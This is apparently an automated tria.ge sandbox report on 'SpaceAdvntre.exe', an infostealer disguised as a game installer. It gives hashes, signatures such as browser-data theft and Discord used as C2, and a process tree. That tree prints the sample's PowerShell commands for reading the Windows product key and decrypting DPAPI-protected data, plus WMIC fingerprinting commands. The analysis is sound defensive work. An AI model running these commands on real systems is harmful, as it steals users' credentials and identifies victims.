Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
7Static
static
3SpaceAdvntre.exe
windows10-2004-x64
7$PLUGINSDI...er.dll
windows10-2004-x64
1$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ll.dll
windows10-2004-x64
3SpaceAdvntre.exe
windows10-2004-x64
7chrome_100...nt.pak
windows10-2004-x64
3chrome_200...nt.pak
windows10-2004-x64
3d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows10-2004-x64
1icudtl.dat
windows10-2004-x64
3libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows10-2004-x64
1locales/en-US.pak
windows10-2004-x64
3resources.pak
windows10-2004-x64
3resources/app.asar
windows10-2004-x64
3resources/elevate.exe
windows10-2004-x64
1snapshot_blob.bin
windows10-2004-x64
3v8_context...ot.bin
windows10-2004-x64
3vk_swiftshader.dll
windows10-2004-x64
1vk_swiftsh...d.json
windows10-2004-x64
3vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...ec.dll
windows10-2004-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3$R0/Uninst...re.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDI...ll.dll
windows10-2004-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3Analysis
-
max time kernel
152s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
17/04/2024, 14:42
Static task
static1
Behavioral task
behavioral1
Sample
SpaceAdvntre.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral2
Sample
$PLUGINSDIR/SpiderBanner.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/WinShell.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral6
Sample
SpaceAdvntre.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral7
Sample
chrome_100_percent.pak
Resource
win10v2004-20240412-en
Behavioral task
behavioral8
Sample
chrome_200_percent.pak
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral10
Sample
ffmpeg.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral11
Sample
icudtl.dat
Resource
win10v2004-20240412-en
Behavioral task
behavioral12
Sample
libEGL.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral13
Sample
libGLESv2.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral14
Sample
locales/en-US.pak
Resource
win10v2004-20240412-en
Behavioral task
behavioral15
Sample
resources.pak
Resource
win10v2004-20240412-en
Behavioral task
behavioral16
Sample
resources/app.asar
Resource
win10v2004-20240412-en
Behavioral task
behavioral17
Sample
resources/elevate.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral18
Sample
snapshot_blob.bin
Resource
win10v2004-20240412-en
Behavioral task
behavioral19
Sample
v8_context_snapshot.bin
Resource
win10v2004-20240412-en
Behavioral task
behavioral20
Sample
vk_swiftshader.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral21
Sample
vk_swiftshader_icd.json
Resource
win10v2004-20240412-en
Behavioral task
behavioral22
Sample
vulkan-1.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral23
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral24
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral25
Sample
$R0/Uninstall SpaceAdvntre.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral26
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral27
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral28
Sample
$PLUGINSDIR/WinShell.dll
Resource
win10v2004-20240412-en
Behavioral task
behavioral29
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240412-en
General
-
Target
SpaceAdvntre.exe
-
Size
154.6MB
-
MD5
acf576f53d1d1376681fd4a35dce19b9
-
SHA1
8138a9f90af9f95d0ed3f86f993a674a300c554a
-
SHA256
1a61d9d12765ec87e611cec885a586ec9dcec7e28b300a8f84e27ecb55463f4d
-
SHA512
f554e938211d44d167620d65ac80db6cc7aece05061b65fd25a7ecd8506d878e2e0535bc9840ce093c87b047ddd6e76c451cd6ef26ab700a5def833434c2eedd
-
SSDEEP
1572864:uTmw0ciLNpDPuAvHxJLkY2O6Ea3f9kwZXeT6EivLp1vUAtdjtZn+f4FnIvGaC9dU:pv6E70+Mk
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation SpaceAdvntre.exe -
Loads dropped DLL 1 IoCs
pid Process 984 SpaceAdvntre.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 44 discord.com 45 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 1160 cmd.exe 4724 cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4900 tasklist.exe 2016 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 3716 powershell.exe 3716 powershell.exe 1020 powershell.exe 1020 powershell.exe 684 powershell.exe 684 powershell.exe 1832 SpaceAdvntre.exe 1832 SpaceAdvntre.exe 3708 SpaceAdvntre.exe 3708 SpaceAdvntre.exe 3708 SpaceAdvntre.exe 3708 SpaceAdvntre.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4900 tasklist.exe Token: SeDebugPrivilege 3716 powershell.exe Token: SeDebugPrivilege 2016 tasklist.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeIncreaseQuotaPrivilege 3964 WMIC.exe Token: SeSecurityPrivilege 3964 WMIC.exe Token: SeTakeOwnershipPrivilege 3964 WMIC.exe Token: SeLoadDriverPrivilege 3964 WMIC.exe Token: SeSystemProfilePrivilege 3964 WMIC.exe Token: SeSystemtimePrivilege 3964 WMIC.exe Token: SeProfSingleProcessPrivilege 3964 WMIC.exe Token: SeIncBasePriorityPrivilege 3964 WMIC.exe Token: SeCreatePagefilePrivilege 3964 WMIC.exe Token: SeBackupPrivilege 3964 WMIC.exe Token: SeRestorePrivilege 3964 WMIC.exe Token: SeShutdownPrivilege 3964 WMIC.exe Token: SeDebugPrivilege 3964 WMIC.exe Token: SeSystemEnvironmentPrivilege 3964 WMIC.exe Token: SeRemoteShutdownPrivilege 3964 WMIC.exe Token: SeUndockPrivilege 3964 WMIC.exe Token: SeManageVolumePrivilege 3964 WMIC.exe Token: 33 3964 WMIC.exe Token: 34 3964 WMIC.exe Token: 35 3964 WMIC.exe Token: 36 3964 WMIC.exe Token: SeIncreaseQuotaPrivilege 3964 WMIC.exe Token: SeSecurityPrivilege 3964 WMIC.exe Token: SeTakeOwnershipPrivilege 3964 WMIC.exe Token: SeLoadDriverPrivilege 3964 WMIC.exe Token: SeSystemProfilePrivilege 3964 WMIC.exe Token: SeSystemtimePrivilege 3964 WMIC.exe Token: SeProfSingleProcessPrivilege 3964 WMIC.exe Token: SeIncBasePriorityPrivilege 3964 WMIC.exe Token: SeCreatePagefilePrivilege 3964 WMIC.exe Token: SeBackupPrivilege 3964 WMIC.exe Token: SeRestorePrivilege 3964 WMIC.exe Token: SeShutdownPrivilege 3964 WMIC.exe Token: SeDebugPrivilege 3964 WMIC.exe Token: SeSystemEnvironmentPrivilege 3964 WMIC.exe Token: SeRemoteShutdownPrivilege 3964 WMIC.exe Token: SeUndockPrivilege 3964 WMIC.exe Token: SeManageVolumePrivilege 3964 WMIC.exe Token: 33 3964 WMIC.exe Token: 34 3964 WMIC.exe Token: 35 3964 WMIC.exe Token: 36 3964 WMIC.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeShutdownPrivilege 984 SpaceAdvntre.exe Token: SeCreatePagefilePrivilege 984 SpaceAdvntre.exe Token: SeIncreaseQuotaPrivilege 3492 WMIC.exe Token: SeSecurityPrivilege 3492 WMIC.exe Token: SeTakeOwnershipPrivilege 3492 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 984 wrote to memory of 1900 984 SpaceAdvntre.exe 88 PID 984 wrote to memory of 1900 984 SpaceAdvntre.exe 88 PID 984 wrote to memory of 112 984 SpaceAdvntre.exe 89 PID 984 wrote to memory of 112 984 SpaceAdvntre.exe 89 PID 1900 wrote to memory of 3716 1900 cmd.exe 92 PID 1900 wrote to memory of 3716 1900 cmd.exe 92 PID 112 wrote to memory of 4900 112 cmd.exe 93 PID 112 wrote to memory of 4900 112 cmd.exe 93 PID 984 wrote to memory of 4576 984 SpaceAdvntre.exe 95 PID 984 wrote to memory of 4576 984 SpaceAdvntre.exe 95 PID 984 wrote to memory of 1160 984 SpaceAdvntre.exe 97 PID 984 wrote to memory of 1160 984 SpaceAdvntre.exe 97 PID 4576 wrote to memory of 2016 4576 cmd.exe 99 PID 4576 wrote to memory of 2016 4576 cmd.exe 99 PID 1160 wrote to memory of 1020 1160 cmd.exe 100 PID 1160 wrote to memory of 1020 1160 cmd.exe 100 PID 984 wrote to memory of 4724 984 SpaceAdvntre.exe 101 PID 984 wrote to memory of 4724 984 SpaceAdvntre.exe 101 PID 4724 wrote to memory of 684 4724 cmd.exe 103 PID 4724 wrote to memory of 684 4724 cmd.exe 103 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 1300 984 SpaceAdvntre.exe 105 PID 984 wrote to memory of 4816 984 SpaceAdvntre.exe 106 PID 984 wrote to memory of 4816 984 SpaceAdvntre.exe 106 PID 984 wrote to memory of 1832 984 SpaceAdvntre.exe 107 PID 984 wrote to memory of 1832 984 SpaceAdvntre.exe 107 PID 4816 wrote to memory of 3964 4816 cmd.exe 109 PID 4816 wrote to memory of 3964 4816 cmd.exe 109 PID 984 wrote to memory of 2724 984 SpaceAdvntre.exe 110 PID 984 wrote to memory of 2724 984 SpaceAdvntre.exe 110 PID 2724 wrote to memory of 3492 2724 cmd.exe 112 PID 2724 wrote to memory of 3492 2724 cmd.exe 112 PID 984 wrote to memory of 4068 984 SpaceAdvntre.exe 113 PID 984 wrote to memory of 4068 984 SpaceAdvntre.exe 113 PID 4068 wrote to memory of 2904 4068 cmd.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe"C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,175,76,161,134,224,137,176,56,163,3,175,40,19,32,92,145,225,199,82,244,131,244,253,2,58,67,90,144,223,136,175,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,185,24,135,231,40,134,93,219,124,208,7,211,31,203,122,84,212,86,123,229,53,132,132,226,132,135,143,113,36,166,131,6,48,0,0,0,218,174,184,184,184,254,161,155,81,219,224,215,64,205,239,188,172,213,179,207,160,102,124,235,187,43,255,100,21,146,78,171,123,42,231,82,170,252,58,17,236,179,242,209,97,41,251,171,64,0,0,0,240,165,245,19,196,166,84,106,144,224,100,251,48,217,208,215,213,56,76,155,191,160,179,134,32,59,37,208,129,208,206,196,64,33,51,255,143,102,100,50,249,175,38,170,33,222,80,138,252,254,76,53,252,172,146,27,67,238,223,130,255,132,50,147), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,175,76,161,134,224,137,176,56,163,3,175,40,19,32,92,145,225,199,82,244,131,244,253,2,58,67,90,144,223,136,175,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,185,24,135,231,40,134,93,219,124,208,7,211,31,203,122,84,212,86,123,229,53,132,132,226,132,135,143,113,36,166,131,6,48,0,0,0,218,174,184,184,184,254,161,155,81,219,224,215,64,205,239,188,172,213,179,207,160,102,124,235,187,43,255,100,21,146,78,171,123,42,231,82,170,252,58,17,236,179,242,209,97,41,251,171,64,0,0,0,240,165,245,19,196,166,84,106,144,224,100,251,48,217,208,215,213,56,76,155,191,160,179,134,32,59,37,208,129,208,206,196,64,33,51,255,143,102,100,50,249,175,38,170,33,222,80,138,252,254,76,53,252,172,146,27,67,238,223,130,255,132,50,147), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,248,235,49,138,142,189,104,1,109,218,244,53,122,212,178,249,229,108,209,244,72,234,123,126,207,63,141,70,231,119,6,241,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,45,229,139,113,15,60,156,64,75,210,221,149,107,176,204,206,223,140,215,102,98,0,202,73,167,165,95,81,244,204,30,48,0,0,0,159,65,239,47,193,103,240,79,154,80,226,158,99,10,187,54,27,43,149,239,44,43,50,241,85,118,100,160,55,35,4,5,71,7,147,24,9,204,151,49,123,143,123,174,107,90,184,232,64,0,0,0,194,24,38,210,116,69,79,130,181,232,35,188,221,21,190,87,247,64,69,131,46,79,254,65,31,21,214,249,103,245,141,3,45,226,66,120,199,31,146,206,10,217,198,190,184,32,146,37,147,76,162,180,81,77,233,1,253,121,27,101,176,107,25,65), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,248,235,49,138,142,189,104,1,109,218,244,53,122,212,178,249,229,108,209,244,72,234,123,126,207,63,141,70,231,119,6,241,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,45,229,139,113,15,60,156,64,75,210,221,149,107,176,204,206,223,140,215,102,98,0,202,73,167,165,95,81,244,204,30,48,0,0,0,159,65,239,47,193,103,240,79,154,80,226,158,99,10,187,54,27,43,149,239,44,43,50,241,85,118,100,160,55,35,4,5,71,7,147,24,9,204,151,49,123,143,123,174,107,90,184,232,64,0,0,0,194,24,38,210,116,69,79,130,181,232,35,188,221,21,190,87,247,64,69,131,46,79,254,65,31,21,214,249,103,245,141,3,45,226,66,120,199,31,146,206,10,217,198,190,184,32,146,37,147,76,162,180,81,77,233,1,253,121,27,101,176,107,25,65), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
-
C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe"C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\SpaceAdvntre" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 --field-trial-handle=2020,i,11541216000348560715,17284866817236837902,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:1300
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"2⤵
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe"C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\SpaceAdvntre" --mojo-platform-channel-handle=1196 --field-trial-handle=2020,i,11541216000348560715,17284866817236837902,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\Wbem\WMIC.exewmic cpu get ProcessorId3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"2⤵
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get Product3⤵PID:2904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"2⤵PID:1616
-
C:\Windows\System32\Wbem\WMIC.exewmic baseboard get SerialNumber3⤵PID:4720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"2⤵PID:1584
-
C:\Windows\System32\Wbem\WMIC.exewmic OS get caption3⤵PID:4128
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"2⤵PID:208
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get TotalPhysicalMemory3⤵PID:3928
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"2⤵PID:1264
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_videocontroller get caption,PNPDeviceID3⤵PID:1628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"2⤵PID:224
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get SerialNumber3⤵PID:4900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"2⤵PID:4612
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_computersystemproduct get uuid3⤵PID:1388
-
-
-
C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe"C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\SpaceAdvntre" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 --field-trial-handle=2020,i,11541216000348560715,17284866817236837902,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:3708
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
1KB
MD58e26941f21dac5843c6d170e536afccb
SHA126b9ebd7bf3ed13bc51874ba06151850a0dac7db
SHA256316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0
SHA5129148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62
-
Filesize
1.4MB
MD556192831a7f808874207ba593f464415
SHA1e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA2566aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82